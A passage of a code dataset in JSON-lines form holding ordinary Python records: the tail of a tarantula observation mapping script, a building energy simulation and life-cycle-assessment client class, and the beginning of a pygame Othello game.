'lat_long'].iloc[0][1])+.22, \n (city_info_df.loc[city_info_df['city'] == 'San Jose', 'lat_long'].iloc[0][0]), \n 'San Jose', color = 'black', fontsize=15)\nplt.text((city_info_df.loc[city_info_df['city'] == 'Los Angeles', 'lat_long'].iloc[0][1])-2.5,\n (city_info_df.loc[city_info_df['city'] == 'Los Angeles', 'lat_long'].iloc[0][0]),\n 'Los Angeles', color = 'black', fontsize=15)\nplt.text((city_info_df.loc[city_info_df['city'] == 'Sacramento', 'lat_long'].iloc[0][1]),\n (city_info_df.loc[city_info_df['city'] == 'Sacramento', 'lat_long'].iloc[0][0]),\n 'Sacramento', color = 'black', fontsize=15)\n \n#give the plot a title and position the title \nfirst_year = '2018'\nlast_year = 'present'\nplt.title(f\"Tarantula observations in California\\n{first_year} to {last_year}\", \n fontsize = 20, weight='bold', loc = 'left', y=1.01)\n\n#add grid\n#ax.grid(b=True, alpha=0.5)\n\n#add legend\nblue_point = mlines.Line2D([], [], color='blue', marker='.', linestyle='None',\n markersize=15, label='observations')\ngrey_line = mlines.Line2D([], [], color='grey', marker='',\n markersize=15, label='county borders')\nyellow_patch = mpatches.Patch(color='yellow', label='State Parks')\ngreen_patch = mpatches.Patch(color='lightgreen', label='Wlderness Areas')\nax.legend(handles=[blue_point, grey_line, yellow_patch, green_patch],\n frameon=False,\n loc='upper right', bbox_to_anchor=(0.9, 0.95),\n #title='Legend', title_fontsize=18,\n fontsize = 12)\n\n#save the figure\nplt.savefig('YOUR FILE PATH/tarantualas_california.png', dpi=300)\n\n#display the plot\nplt.show()\n\n\n# In[11]:\n\n\nprint(\"Run time for your api request: %s seconds\" % (query_time))\nprint(\"Run time total: %s seconds\" % (time.time() - start_time))\n\n\n\n\n\n\n\n","repo_name":"Floydworks/Tarantulas_Map_iNat","sub_path":"Tarantulas_web.py","file_name":"Tarantulas_web.py","file_ext":"py","file_size_in_byte":10561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35254552076","text":"import logging\nimport shutil\nimport sys\nimport time\nimport traceback\nimport uuid\nfrom pathlib import Path\nfrom typing import MutableMapping, Mapping, Union, Callable, Tuple, List\n\nfrom eppy.modeleditor import IDF\nimport pandas as pd\n\nfrom 
boblica.calculation.energy import EnergyPlusSimulation, SteadyStateCalculation\nfrom boblica.tools.optimization import Parameter\nfrom boblica.model.building import Building\nfrom boblica.calculation.lca import LCACalculation, ImpactResult\nfrom boblica.calculation.cost import CostCalculation, CostResult\nfrom boblica.tools.serializer import IdfSerializer\n\nlogger = logging.getLogger(__name__)\n\n\nclass LocalClient:\n\n def __init__(self):\n self.name = None\n self.epw = None\n self.weather_data = None\n self.idf = None\n self.model = None\n self.parameters = None\n self.lca_calculation = None\n self.cost_calculation = None\n self.energy_calculation = None\n # extras for local mode\n self._results = None\n self.update_model = None\n self.evaluate = None\n\n self._idd_path = None\n self.idf_parser = None\n\n # args of the IdfSerializer.update_idf() method to be used in the update method:\n self.idf_update_options = {\n 'update_collections': True, # True / False\n 'zone_method': None, # 'recreate' / 'update' / None\n 'non_zone_surf_method': None, # 'recreate' / 'update' / None\n 'fenestration_method': 'recreate', # 'recreate' / 'update' / None\n 'surface_method': None, # 'recreate' / 'update' / None\n 'internal_mass_method': None # 'recreate' / 'update' / None\n }\n\n # args of the EnergyPlusSimulation.set_outputs() method by output type\n # as well as to the EnergyPlusSimulation.\n self.energy_calculation_options = {\n # what output to save during simulation\n 'outputs': {\n 'zone': [\n 'heating', # this is the minimum required by the lca calculation\n 'cooling', # this is the minimum required by the lca calculation\n # 'infiltration',\n # 'solar gains',\n # 'glazing loss',\n # 'opaque loss',\n # 'ventilation',\n 'lights', # this is the minimum required by the lca calculation\n # 'equipment',\n # 'people',\n ],\n 'surface': [\n # 'opaque loss',\n # 'glazing loss',\n # 'glazing gain',\n ]\n },\n # all lower resolutions will be saved\n 'output_resolution': 'runperiod', # 'runperiod' / 'annual' / 'monthly' / 'daily' / 'hourly' / 'timestep'\n 'clear_existing_variables': True\n }\n\n self.simulation_output_folder = None\n self.simulation = None\n self.steady_state = None\n\n @property\n def idd_path(self):\n return self._idd_path\n\n @idd_path.setter\n def idd_path(self, path: str):\n self._idd_path = path\n idd_path = Path(path)\n self.idf_parser = IdfSerializer(idd_path=idd_path)\n\n @property\n def results(self) -> pd.DataFrame:\n return self._results\n\n @results.setter\n def results(self, df: pd.DataFrame):\n self._results = df\n\n @property\n def energy_plus_path(self) -> str:\n return self._energy_plus_path\n\n @energy_plus_path.setter\n def energy_plus_path(self, path: Union[str, Path]):\n if isinstance(path, str):\n full_path = Path(path).absolute()\n else:\n full_path = path.absolute()\n self._energy_plus_path = full_path\n\n def setup(self,\n name: str,\n epw: Path = None,\n weather_data: Path = None,\n idf: IDF = None,\n model: Building = None,\n parameters: MutableMapping[str, Parameter] = None,\n lca_calculation: LCACalculation = None,\n cost_calculation: CostCalculation = None,\n energy_calculation: str = None,\n update_model_function: Callable[[MutableMapping[str, Parameter], Building], Building] = None,\n evaluate_function: Callable[[pd.DataFrame, pd.DataFrame, pd.DataFrame], pd.Series] = None,\n init_db: bool = True) -> str:\n \"\"\"\n Setup the server with the following options. 
The options can also be set independently.\n\n :param name: Name of the calculation setup tp create or update\n :param epw: Path to epw file for weather data for simulation\n :param weather_data: Path to csv weather data for steady state energy calculation\n :param idf: eppy IDF model of the building\n :param model: converted boblica model of the building\n :param parameters: dict of boblica Parameters to use for parametric definition\n :param lca_calculation:\n :param cost_calculation:\n :param energy_calculation: 'simulation' or 'steady_state'\n :param init_db: set True (default) to create results database for the setup\n :return: success message\n \"\"\"\n\n logger.info('Setting up calculation locally')\n self.name = name\n\n if epw is not None:\n logger.debug('Setting up EPW')\n self.epw = epw\n\n if weather_data is not None:\n logger.debug('Setting up weather data')\n weather = pd.read_csv(str(weather_data), header=[0, 1], index_col=[0, 1])\n self.weather_data = weather\n\n if idf is not None:\n logger.debug('Setting up IDF')\n self.idf = idf\n self.idf.epw = str(self.epw)\n self.idd_path = idf.iddname\n\n if model is not None:\n logger.debug('Setting up model')\n self.model = model\n\n if parameters is not None:\n logger.debug('Setting up parameters locally')\n self.parameters = parameters\n\n if lca_calculation is not None:\n logger.debug('Setting up LCA Calculation locally')\n self.lca_calculation = lca_calculation\n\n if cost_calculation is not None:\n logger.debug('Setting up Cost Calculation locally')\n self.cost_calculation = cost_calculation\n\n if init_db:\n logger.debug('Initiating result DataFrame')\n self._results = pd.DataFrame()\n\n if energy_calculation:\n if energy_calculation not in ['simulation', 'steady_state']:\n return 'Energy calculation type can be one of the following: simulation / steady_state'\n logger.debug('Setting up Energy Calculation type locally')\n self.energy_calculation = energy_calculation\n\n if energy_calculation == 'simulation':\n self.simulation_output_folder = Path(f\"./simulation_output\").absolute()\n self.simulation = EnergyPlusSimulation(typ='local',\n output_directory=str(self.simulation_output_folder),\n ep_exe_path=str(self.energy_plus_path))\n elif energy_calculation == 'steady_state':\n self.steady_state = SteadyStateCalculation()\n self.steady_state.weather_data = self.weather_data\n\n if update_model_function is not None:\n self.update_model = update_model_function\n\n if evaluate_function is not None:\n self.evaluate = evaluate_function\n\n return 'OK'\n\n def calculate(self, parameters: MutableMapping[str, Union[float, int, str]], name=None):\n \"\"\"\n Calculate the impact based on the parameters\n Model is updated, calculations are made and results are written into a local result DataFrame\n This is the entry point for external optimization algorithms\n\n :param name: Name of the calculation setup\n :param parameters: Parameters as a dict\n :return: result of the evaluation function as a dict\n \"\"\"\n # get the name of the calculation setup\n\n parameters, msg = self._update_params(parameters=parameters)\n\n try:\n # ----------------------- MODEL UPDATE --------------------------------\n model, idf = self._update_model(parameters=parameters)\n\n # ----------------------- CALCULATIONS --------------------------------\n tic = time.perf_counter()\n impact_result, cost_result, energy_result, sim_id = self._run(model=model, idf=idf,\n drop_sim_result=True)\n toc = time.perf_counter()\n\n # measure execution time\n exec_time = toc - 
tic\n\n # ----------------------- EVALUATION --------------------------------\n result = self.evaluate(impacts=impact_result.impacts, costs=cost_result.costs, energy=energy_result)\n\n except Exception as err:\n # if anything goes wrong return an invalid result value (e.g. infinity)\n logger.info('Calculation failed with error: {e}: {r}'.format(e=sys.exc_info()[0], r=err))\n logger.debug('Traceback: {tr}'.format(tr=traceback.format_exc()))\n\n result = self.evaluate()\n sim_id = 'failed'\n exec_time = float('inf')\n\n # -------------------- WRITE RESULTS TO DATABASE --------------------\n logger.info('Saving results to result DataFrame for: {id}'.format(id=sim_id))\n\n # collect updated parameters\n data = {p.name: p.value for p in parameters.values()}\n\n # Create pandas Series from parameters and results\n result_series = pd.Series(data=data, name=sim_id)\n result_series = result_series.append(result)\n result_series['calculation_id'] = sim_id\n result_series['calculation_time'] = exec_time\n result_series['timestamp'] = time.perf_counter()\n result_frame = result_series.to_frame().transpose()\n\n if self.results is None:\n self.results = result_frame\n else:\n self.results = self.results.append(result_frame, ignore_index=True)\n\n return result.to_dict()\n\n def _update_params(self,\n parameters: MutableMapping[str, Union[float, int, str]],\n calculation_id: str = None) -> Tuple[MutableMapping[str, Parameter], Union[str, None]]:\n \"\"\"\n\n Parameters\n ----------\n parameters\n calculation_id\n\n Returns\n -------\n\n \"\"\"\n\n msg = None\n\n if calculation_id is not None:\n try:\n db_values = self.results.loc[calculation_id, :]\n except KeyError:\n msg = 'No previous calculation found for id: {id}'.format(id=calculation_id)\n return self.parameters, msg\n else:\n db_values = {n: None for n in parameters.keys()}\n\n for par_name, param in self.parameters.items():\n if calculation_id is not None:\n # get value from previous calculations\n value = db_values[par_name]\n else:\n # get value from passed dictionary\n value = parameters[par_name]\n\n if value is None:\n msg = 'Missing value for parameter: {p}'.format(p=par_name)\n return self.parameters, msg\n\n # convert type of parameter\n try:\n if param.type == 'float':\n value = float(value)\n elif param.type == 'str':\n value = str(value)\n else:\n msg = 'Parameter type of {p} needs to be one of [\"str\", \"float\"], not {pt}'.format(\n pt=param.type, p=param.name\n )\n return self.parameters, msg\n except ValueError as e:\n msg = 'Parameter conversion failed: {e}'.format(e=e)\n return self.parameters, msg\n\n if param.limits != (None, None):\n minimum, maximum = param.limits\n if not minimum <= value <= maximum:\n msg = 'Parameter value {v} of {p} exceeds its limits: {lim}'.format(\n v=value, p=param.name, lim=param.limits\n )\n return self.parameters, msg\n\n if param.type == 'str' and param.options is not None:\n if value not in param.options:\n msg = 'Parameter value {v} of {p} is invalid, options are: {o}'.format(\n v=value, p=param.name, o=param.options\n )\n return self.parameters, msg\n\n # update parameter value\n param.value = value\n\n return self.parameters, msg\n\n def _update_model(self, parameters: MutableMapping[str, Parameter]) -> Tuple[Building, IDF]:\n\n logger.info('Updating model: {n}'.format(n=self.name))\n param_values = ['{n}: {v}'.format(n=name, v=p.value) for name, p in parameters.items()]\n logger.debug('Parameters: ' + '; '.join(param_values))\n\n # update the model\n self.model = 
self.update_model(parameters=parameters, model=self.model)\n\n # If idf is present, update idf too along with the model\n if self.idf is not None:\n logger.debug('Updating idf based on model: {n}'.format(n=self.name))\n\n self.idf_parser.idf = self.idf\n self.idf_parser.update_idf(model=self.model, **self.idf_update_options)\n\n return self.model, self.idf_parser.idf\n \n # Otherwise, return the model only, and None for idf\n else:\n return self.model, None\n\n def _run(self,\n model: Building,\n idf: IDF = None,\n simulation_id: str = None,\n simulation_options: MutableMapping = None,\n drop_sim_result: bool = False) -> Tuple[ImpactResult, CostResult, pd.DataFrame, str]:\n \"\"\"\n Run calculations with the model. Either idf or simulation_id is needed. If simulation_id is given, no\n simulation will run, existing results will be read\n :param name: name of the calculation setup\n :param model: Building model tu run calculation on\n :param idf: IDF representing the same model to use in simulation\n :param simulation_id: if simulation has been made before, the id of the simulation\n :param simulation_options: optional dictionary to pass to customize the simulation\n :param drop_sim_result: weather to keep the simulation results on the server or not\n :return: impact result, cost result, energy result and simulation id\n \"\"\"\n ENERGY_SIMULATION = self.simulation\n ENERGY_STEADY_STATE = self.steady_state\n name = self.name\n\n def run_simulation(options, sim_id=None):\n logger.info('Running simulation')\n\n frequency = options['output_resolution']\n if frequency is not None:\n ENERGY_SIMULATION.output_frequency = frequency\n\n ENERGY_SIMULATION.idf = idf\n\n if options['clear_existing_variables']:\n ENERGY_SIMULATION.clear_outputs()\n\n zone_outputs: List = options['outputs']['zone']\n logger.debug('Setting zone outputs: {}'.format(zone_outputs))\n if zone_outputs: # not an empty list\n ENERGY_SIMULATION.set_outputs(*zone_outputs, typ='zone')\n else: # this would never happen since we set the defaults above\n ENERGY_SIMULATION.set_outputs('heating', 'cooling', 'lights', typ='zone')\n\n surface_outputs: List = options['outputs']['surface']\n logger.debug('Setting surface outputs: {}'.format(surface_outputs))\n if surface_outputs: # not an empty list\n ENERGY_SIMULATION.set_outputs(*surface_outputs, typ='surface')\n\n if sim_id is not None:\n sim_id = ENERGY_SIMULATION.run(name=name, sim_id=sim_id)\n else:\n sim_id = ENERGY_SIMULATION.run(name=name)\n\n logger.info('Simulation ready, id: {sid}'.format(sid=sim_id))\n return sim_id\n\n # energy calculation\n if self.energy_calculation == 'simulation':\n if simulation_options is None:\n energy_calculation_options = self.energy_calculation_options\n else:\n energy_calculation_options = simulation_options\n\n # Add defaults to the specification\n if 'outputs' not in energy_calculation_options:\n energy_calculation_options['outputs'] = {\n 'zone': ['heating', 'cooling', 'lights'],\n 'surface': []\n }\n else:\n if 'zone' not in energy_calculation_options['outputs']:\n energy_calculation_options['outputs']['zone'] = ['heating', 'cooling', 'lights']\n else:\n if 'heating' not in energy_calculation_options['outputs']['zone']:\n energy_calculation_options['outputs']['zone'].append('heating')\n if 'cooling' not in energy_calculation_options['outputs']['zone']:\n energy_calculation_options['outputs']['zone'].append('cooling')\n if 'lights' not in energy_calculation_options['outputs']['zone']:\n 
energy_calculation_options['outputs']['zone'].append('lights')\n if 'surface' not in energy_calculation_options['outputs']:\n energy_calculation_options['outputs']['surface'] = []\n\n if 'output_resolution' not in energy_calculation_options:\n energy_calculation_options['output_resolution'] = 'runperiod'\n\n if 'clear_existing_variables' not in energy_calculation_options:\n energy_calculation_options['clear_existing_variables'] = False\n\n if simulation_id is not None:\n logger.info('Getting previous results for simulation with id: {sid}'.format(sid=simulation_id))\n response = ENERGY_SIMULATION.results(variables=['heating', 'cooling', 'lights'],\n name=name,\n sim_id=simulation_id,\n typ='zone', period='runperiod')\n\n if 'No result directory' in response:\n logger.info('No results found for id: {sid}, rerunning simulation...'.format(sid=simulation_id))\n simulation_id = run_simulation(options=energy_calculation_options, sim_id=simulation_id)\n\n logger.info('Getting results for simulation with id: {sid}'.format(sid=simulation_id))\n response = ENERGY_SIMULATION.results(variables=['heating', 'cooling', 'lights'],\n name=name,\n sim_id=simulation_id,\n typ='zone', period='runperiod')\n\n else:\n simulation_id = run_simulation(options=energy_calculation_options)\n\n logger.info('Getting results for simulation with id: {sid}'.format(sid=simulation_id))\n time.sleep(3)\n response = ENERGY_SIMULATION.results(variables=['heating', 'cooling', 'lights'],\n name=name,\n sim_id=simulation_id,\n typ='zone', period='runperiod')\n\n if isinstance(response, pd.DataFrame):\n energy_calc_results = response\n if drop_sim_result:\n logger.debug('Disposing result of simulation: {sid}'.format(sid=simulation_id))\n ENERGY_SIMULATION.drop_local_result(name=name, sim_id=simulation_id)\n else:\n error_message = 'EnergyPlus error: {t}'.format(t=response)\n logger.info(error_message)\n raise Exception(error_message)\n calculation_id = simulation_id\n\n elif self.energy_calculation == 'steady_state':\n calculation_id = str(uuid.uuid1())\n logger.info('Running steady state energy calculation with id: {id}'.format(id=calculation_id))\n\n energy_calc_results = ENERGY_STEADY_STATE.calculate(model)\n\n else:\n raise Exception('Energy calculation option \"{ec}\" not implemented.'.format(ec=self.energy_calculation))\n\n # TODO make impact and cost calculation optional\n # impact calculation\n logger.info('Calculating life cycle impact for: {id}'.format(id=calculation_id))\n\n self.lca_calculation.clear_cache()\n\n lca_result = self.lca_calculation.calculate_impact(model, demands=energy_calc_results)\n\n # cost calculation\n logger.info('Calculating life cycle costs for: {id}'.format(id=calculation_id))\n\n self.cost_calculation.clear_cache()\n\n cost_result = self.cost_calculation.calculate_cost(model, demands=energy_calc_results)\n\n return lca_result, cost_result, energy_calc_results, calculation_id\n\n def cleanup(self, target: str = None, calc_id: str = None) -> str:\n \"\"\"\n Cleanup server from stored data if target is not specified both will be deleted\n Prompts for confirmation\n\n Parameters\n ----------\n target\n 'results' / 'individuals' / 'simulations'\n calc_id\n the calculation id if 'individuals' option is selected\n\n Returns\n -------\n message\n\n \"\"\"\n\n if target == 'results' or target is None:\n logger.warning('Result data will be cleared for setup: {n}'.format(n=self.name))\n if target == 'individuals':\n if calc_id is None:\n logger.warning('All result for setup {n} will be 
cleared'.format(n=self.name))\n else:\n logger.warning('Individual result for setup {n} with id: {cid} will be cleared'.format(n=self.name,\n cid=calc_id))\n if target == 'simulations' or target is None:\n logger.warning('Simulation results will be deleted for setup: {n}'.format(n=self.name))\n\n if input('Are you sure? (y/n): ') == 'y':\n if target == 'results' or target is None:\n self._results = None\n if target == 'individuals':\n if calc_id is None:\n self._results = pd.DataFrame()\n else:\n self._results = self.results[self.results[\"calculation_id\"] != calc_id]\n if target == 'simulations' or target is None:\n shutil.rmtree(f'{self.simulation_output_folder}_{self.name}')\n return 'OK'\n else:\n logger.warning('Cleanup cancelled')\n\n def reinstate(self, name: str, calc_id: str) -> Mapping:\n \"\"\"\n Same as calculate() but the results are not saved to the database and the parameters are\n retrieved from the result database based on the calculation id\n Use this to update the state of the server to further analyse the model\n\n Parameters\n ----------\n name\n calc_id\n\n Returns\n -------\n\n \"\"\"\n\n # url = self.url + '/reinstate'\n # response = requests.get(url=url, params={'name': name, 'id': calc_id})\n # try:\n # return response.json()\n # except JSONDecodeError:\n # return response.text\n\n def instate(self, parameters: Mapping[str, Union[float, int, str]],\n options: Mapping = None) -> Mapping:\n \"\"\"\n Update state of server for the desired parameters and evaluate.\n Calculation results will not be saved to database.\n\n Parameters\n ----------\n parameters\n parameters as a dict to run calculation for\n options\n simulation options in the following patter\n {\n 'outputs': 'all' or {\n 'zone': [\n 'heating' / 'cooling' / 'lights' / 'infiltration' / 'solar gains' / 'glazing loss' /\n 'opaque loss' /'ventilation' / 'equipment' / 'people' ],\n 'surface': [\n 'opaque loss' / 'glazing loss' / 'glazing gain' ]\n },\n 'output_resolution': 'runperiod' / 'runperiod' / 'annual' / 'monthly' / 'daily' / 'hourly' / 'timestep',\n 'clear_existing_variables': True\n }\n Returns\n -------\n result, simulation id and calculation time in a dict\n\n \"\"\"\n\n # url = self.url + '/instate'\n # payload = {'name': name}\n # payload.update(parameters)\n # if options is not None:\n # response = requests.post(url=url, params=payload, data=json.dumps(options))\n # else:\n # response = requests.get(url=url, params=payload)\n # try:\n # return response.json()\n # except JSONDecodeError:\n # return response.text\n\n def get_params(self) -> Mapping:\n return {name: par.value for name, par in self.parameters.items()}\n\n def get_full_params(self, name=None) -> List[Parameter]:\n return [p for p in self.parameters.values()]\n\n def get_energy(self, calc_id: str = None,\n variables: List[str] = None,\n typ: str = 'zone',\n period: str = 'runperiod') -> pd.DataFrame:\n \"\"\"\n Retrieves the energy calculation results from the server. If steady state calculation is used,\n the result is a DataFrame with columns: 'heating' 'cooling', 'lights. 
If simulation is used,\n the result is specified with the other input parameters\n\n Parameters\n ----------\n name\n calc_id\n id of a previously run simulation (omitted is steady state calculation)\n variables\n variables to get from the simulation (omitted is steady state calculation)\n typ\n 'zone' (default) / 'surface' / 'balance' (omitted is steady state calculation)\n period\n 'runperiod' (default) / 'annual' / 'monthly' / 'daily' / 'hourly' / 'timestep'\n (omitted is steady state calculation)\n Returns\n -------\n DataFrame\n with the requested data\n\n \"\"\"\n\n # url = self.url + '/energy'\n # if variables is None:\n # variables = ['heating', 'cooling', 'lights']\n # response = requests.get(url=url, params={'name': name,\n # 'id': calc_id,\n # 'variables': variables,\n # 'type': typ,\n # 'period': period})\n # try:\n # df = pd.read_json(response.json(), orient='split')\n # return df\n # except JSONDecodeError:\n # return response.text\n\n def get_energy_detailed(self, calc_id: str,\n variable: str,\n typ: str,\n period: str) -> pd.DataFrame:\n \"\"\"\n Get the detailed energy results as a DataFrame\n Parameters\n ----------\n calc_id\n variable\n typ\n period\n\n Returns\n -------\n\n \"\"\"\n # url = self.url + '/energy/detailed'\n #\n # response = requests.get(url=url, params={'name': name,\n # 'id': calc_id,\n # 'variable': variable,\n # 'type': typ,\n # 'period': period})\n # try:\n # df = pd.read_json(response.json(), orient='split')\n # return df\n # except JSONDecodeError:\n # return response.text\n\n def get_idf(self) -> IDF:\n \"\"\"\n Return the actual eppy IDF object\n\n Returns\n -------\n\n \"\"\"\n\n","repo_name":"KBeno/boblica","sub_path":"boblica/app/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":28580,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"6042916844","text":"'''\r\nClasses needed:\r\n - Stone\r\n - Board\r\n - Player\r\n'''\r\n\r\nimport random, sys, pygame, time, copy, itertools\r\nfrom pygame.locals import *\r\n\r\n#Global Parameters\r\nWHITE = (255,255,255)\r\nBLACK = ( 0, 0, 0)\r\nSCREEN_SIZE_X = 800\r\nSCREEN_SIZE_Y = 1000\r\nBOX_LEN = 100\r\nSCREEN = pygame.display.set_mode((SCREEN_SIZE_X,SCREEN_SIZE_Y),0,32)\r\nFPS = 60\r\nFPS_CLOCK = pygame.time.Clock()\r\n\r\nBLACK_PLAYER = True\r\nWHITE_PLAYER = False\r\n\r\nBLACK_STONE = pygame.image.load('BlackStone.png')\r\nWHITE_STONE = pygame.image.load('WhiteStone.png')\r\n\r\nclass StoneTile:\r\n def __init__(self, x, y):\r\n self.pos_x = x\r\n self.pos_y = y\r\n self.parity = None #i.e. whether it's black (True) XOR white (False)\r\n self.sprite = pygame.image.load('StoneBackground.png')\r\n self.length = 100 #This is the size of the box in pixels\r\n\r\n def Draw(self):\r\n SCREEN.blit(self.sprite, (self.pos_x,self.pos_y))\r\n\r\n def Flip(self):\r\n self.parity = not self.parity\r\n if self.parity: #i.e. black\r\n self.sprite = BLACK_STONE\r\n else: #i.e. 
white\r\n self.sprite = WHITE_STONE\r\n\r\n def RemoveStone(self): #initialises the board again\r\n self.parity = None\r\n self.sprite = pygame.image.load('StoneBackground.png')\r\n\r\n def AddStone(self, player):\r\n if player == BLACK_PLAYER:\r\n self.parity = BLACK_PLAYER\r\n self.sprite = BLACK_STONE\r\n else:\r\n self.parity = WHITE_PLAYER\r\n self.sprite = WHITE_STONE\r\n\r\n def ClickInRange(self, pos_tuple):\r\n if (pos_tuple[0] in range(self.pos_x, self.pos_x+self.length+1)) and (pos_tuple[1] in range(self.pos_y, self.pos_y+self.length+1)):\r\n return True\r\n else:\r\n return False\r\n\r\n\r\nclass Board:\r\n def __init__(self):\r\n self.board = self._InitBoard()\r\n self.black_pieces = 0\r\n self.white_pieces = 0\r\n\r\n def Draw(self):\r\n for i in self.board:\r\n for tile in i:\r\n tile.Draw()\r\n\r\n def _InitBoard(self):\r\n #Filling the board with blank squares\r\n full_board = []\r\n temp_board = []\r\n for x in range(0,800, 100):\r\n for y in range(0, 800, 100):\r\n temp_board.append(StoneTile(x,y))\r\n full_board.append(temp_board)\r\n temp_board = []\r\n #Initialising the board with a white black pattern in the middle\r\n full_board[3][3].AddStone(WHITE_PLAYER)\r\n full_board[4][4].AddStone(WHITE_PLAYER)\r\n full_board[3][4].AddStone(BLACK_PLAYER)\r\n full_board[4][3].AddStone(BLACK_PLAYER)\r\n return full_board\r\n\r\n def Full(self): #Returns true if the board is full\r\n for i in self.board:\r\n for tile in i:\r\n if tile.parity == None:\r\n return False\r\n return True\r\n\r\n def AllSameColour(self):\r\n initial_tile = None\r\n for i in self.board:\r\n for tile in i:\r\n if (initial_tile == None) and ((tile.parity == BLACK_PLAYER) or (tile.parity == WHITE_PLAYER)):\r\n initial_tile = tile.parity\r\n if (tile.parity != None) and (tile.parity != initial_tile):\r\n return False\r\n return True\r\n\r\n def _OnBoard(self, x,y): #Checks whether (x, y) indexes a square on the 8x8 board (indices 0-7)\r\n return (x in range(8)) and (y in range(8))\r\n\r\n def _TileAlreadyOnBoard(self, tile):\r\n for i in self.board:\r\n for stone in i:\r\n if stone == tile:\r\n return True\r\n return False\r\n\r\n def AvailablePlaces(self, tile, player): #Returns the stones to flip if the tile can be played, otherwise False\r\n if not self._TileAlreadyOnBoard(tile):\r\n return self.FlipStones(tile,player)\r\n return False\r\n\r\n def FlipStones(self, tile, player): #This method returns a list of the stones to flip\r\n #initially add the tile to the board for this to work\r\n tile.AddStone(player)\r\n \r\n tiles_to_flip = []\r\n x_initial, y_initial = self._Index2d(tile)\r\n for x_direction, y_direction in [[0, 1], [1, 1], [1, 0], [1, -1], [0, -1], [-1, -1], [-1, 0], [-1, 1]]:\r\n x, y = x_initial, y_initial\r\n\r\n x += x_direction\r\n y += y_direction\r\n if self._OnBoard(x,y) and (self.board[x][y].parity == (not player)): #i.e. traversing board so long as\r\n #the opposite colour is present\r\n #and you haven't fallen off the board\r\n x += x_direction\r\n y += y_direction\r\n\r\n if not self._OnBoard(x, y): #if you're off the board, then you can skip this iteration\r\n continue\r\n \r\n while (self.board[x][y].parity != player):\r\n x += x_direction\r\n y += y_direction\r\n if not self._OnBoard(x,y): #i.e. 
you run into a straight line of stones of the opposite parity\r\n break\r\n\r\n if not self._OnBoard(x,y): #skips forward to the next iteration of the for loop\r\n continue\r\n \r\n if (self.board[x][y].parity == player):\r\n #Now we go backwards to the original stone appending the intermediate stones\r\n #to the flip list\r\n while True:\r\n x -= x_direction\r\n y -= y_direction\r\n if ((x==x_initial) and (y == y_initial)):\r\n break\r\n tiles_to_flip.append(self.board[x][y])\r\n tile.RemoveStone()\r\n\r\n if len(tiles_to_flip)==0: #i.e. the move is invalid so you can't flip anything\r\n return False\r\n return tiles_to_flip\r\n \r\n \r\n def Update(self, pos_tuple, player):\r\n for i in self.board:\r\n for tile in i:\r\n has_been_clicked = tile.ClickInRange(pos_tuple)\r\n if has_been_clicked:\r\n if (tile.parity == None): #i.e. if the space is free\r\n flip_tiles = self.FlipStones(tile, player) #Gets the stones to flip\r\n if (flip_tiles != False): #if the move is actually valid\r\n tile.AddStone(player)\r\n if tile in flip_tiles:\r\n flip_tiles.remove(tile)\r\n #Flip the stones\r\n for stone in flip_tiles:\r\n stone.Flip()\r\n #Updates score for AI and player\r\n self._UpdateScore()\r\n return True\r\n else: #i.e. you don't rotate the player\r\n return False\r\n\r\n def _Index2d(self, tile): #returns the index of a tile in the form (row_num,column_num)\r\n for i, x in enumerate(self.board):\r\n if tile in x:\r\n return i, x.index(tile)\r\n\r\n def _UpdateScore(self):\r\n b = w = 0\r\n for row in self.board:\r\n for tile in row:\r\n if tile.parity == BLACK_PLAYER:\r\n b += 1\r\n elif tile.parity == WHITE_PLAYER:\r\n w += 1\r\n self.black_pieces = b\r\n self.white_pieces = w\r\n\r\ndef init(): #Just a basic function used to make the program logic clearer\r\n pygame.init()\r\n SCREEN.fill(WHITE)\r\n pygame.display.set_caption('Othello')\r\n \r\n \r\ndef OutputOnScreen(message, pos = (100,100), font_size = 30):\r\n temp_font = 'Times New Roman'\r\n my_font = pygame.font.SysFont(temp_font, font_size)\r\n my_message = my_font.render(message, 1, BLACK)\r\n SCREEN.blit(my_message, pos)\r\n \r\ndef Stats(black_pieces, white_pieces):\r\n #Outputting player's stats\r\n OutputOnScreen('Player ', (30,830))\r\n black = pygame.image.load('BlackStoneEmpty.png')\r\n SCREEN.blit(black,(115,820))\r\n OutputOnScreen('Pieces:' + str(black_pieces), (300,830))\r\n \r\n #Outputting the AI's stats\r\n OutputOnScreen('AI ', (70,920))\r\n white = pygame.image.load('WhiteStoneEmpty.png')\r\n SCREEN.blit(white,(115,910))\r\n OutputOnScreen('Pieces: ' + str(white_pieces), (300,920))\r\n\r\ndef AIGuess(board, player): #takes a corner if one is available, otherwise plays the first valid position found\r\n if board.Update((50,50), player):\r\n return\r\n elif board.Update((50,750), player):\r\n return\r\n elif board.Update((750,50), player):\r\n return \r\n elif board.Update((750,750), player):\r\n return\r\n else: #Check all other positions\r\n for x in range(8):\r\n for y in range(8):\r\n if board.Update(((x*100)+50,(y*100)+50), player):\r\n return #break out of the function\r\n\r\ndef GameOver(board, player):\r\n total_num_of_moves = 0\r\n for i in board.board:\r\n for tile in i:\r\n if tile.parity == None:\r\n x = board.AvailablePlaces(tile, player) #returns False when the tile yields no flips\r\n if isinstance(x, list):\r\n total_num_of_moves += len(x)\r\n if total_num_of_moves == 0:\r\n OutputOnScreen('GAME OVER', (100,100), 75)\r\n \r\n \r\nif __name__ == '__main__':\r\n #initialising the game\r\n init()\r\n B = Board()\r\n player = BLACK_PLAYER\r\n AI = 
